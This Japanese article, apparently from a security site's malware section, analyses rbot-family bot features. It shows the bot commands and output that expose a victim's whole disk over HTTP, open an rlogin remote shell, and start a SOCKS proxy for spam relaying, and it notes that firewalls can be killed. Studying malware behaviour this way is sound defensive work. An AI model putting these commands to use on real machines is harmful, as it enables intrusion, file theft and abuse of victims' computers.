Articles - Malware |
HTTPサーバ機能でハードディスクを丸見えにする
rbot系のサーバ機能には、前述した設定項目にもあったように、httpdやrlogin、Socksプロキシサーバが備わり、単純にコマンドを入力すれば設定したポートにてサーバが起動する。
たとえば、httpdであれば「.http」と入力するだけだ。これでデフォルト(設定ファイルにて設定したポート番号)にてWebサーバが起動し、ルートディレクトリがマウントされる。このため、外部から接続可能な環境(ファイヤーウォール無し)であれば、この時点でマウントされたハードディスクの内容は全てインターネットへ公開されるというわけだ。つまりハードディスク上のファイルをブラウザ越しに閲覧したり入手することができる。また、Webサーバは、「.httpserver [port] [directory] 」というオプションも指定できるので、ポート番号やマウントするディレクトリを変更することも簡単に行える。
同様にしてrloginサーバやスパムメールなどの踏み台に使われるSocksプロキシサーバも起動できる。たとえば、rloginサーバであれば、「.rloginserver(もしくは.rloginserver [port] [username] )」と入力すれば、指令を行っているユーザー名(デフォルトの場合)でログインが可能になり、コマンドプロンプトでの遠隔操作ができる。
サーバ機能は、いずれもファイヤーウォールが設置されていないということが条件となるが、パーソナルファイヤーウォールのみをインストールしているコンピュータであれば、ファイヤーウォール自体をKILLしたり、設定変更するなどで接続されるケースも考えられなくはない。
■図10:HTTPサーバを起動する。デフォルトの設定であれば、単純に.httpでいいが、オプションでマウントするディレクトリやポート番号を指定することも可能。
.http ←HTTPサーバ起動
<[HJ]-87745> [HTTPD]: Server listening on IP: 192.168.1.145:2001, Directory: \.
.httpstop ←HTTPサーバ停止
<[HJ]-87745> [HTTPD]: Server stopped. (1 thread(s) stopped.)
.httpserver 26000 C:\ ←ポート26000番で起動
<[HJ]-87745> [HTTPD]: Server listening on IP: 192.168.1.145:26000, Directory: C:\.
■図11:ブラウザでアドレス:ポートで接続すれば、ハードディスクの内容は丸見えになるため、情報を閲覧したりダウンロードすることも簡単だ(ファイヤーウォール無しの場合)。
■図12:同様にして、rloginサーバやSocksサーバなども起動できる。
.rloginserver ←rloginサーバを起動
<[HJ]-87745> [RLOGIND]: Server listening on IP: 192.168.1.145:513, Username: k0rnz.
.socks4 ←Socks4プロキシサーバを起動
<[HJ]-87745> [SOCKS4]: Server started on: 192.168.1.145:1243.
■図13:rloginにてターゲットへ接続すれば、コマンド操作が可能になる。
root-box:~# rlogin -i k0rnz -p 513 192.168.1.145 ←rloginでターゲットへ接続
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>dir
ドライブ C のボリューム ラベルがありません。
ボリューム シリアル番号は 1008-8DEA です
C:\Documents and Settings\user のディレクトリ
2005/12/14 18:15 .
2005/12/14 18:15 ..
2005/12/14 17:39 Favorites
2005/12/14 17:39 My Documents
2005/12/14 18:15 WINDOWS
2005/12/14 17:22 スタート メニュー
2006/03/21 22:24 デスクトップ
0 個のファイル 0 バイト
7 個のディレクトリ 5,897,740,288 バイトの空き領域
C:\Documents and Settings\user>cd c:\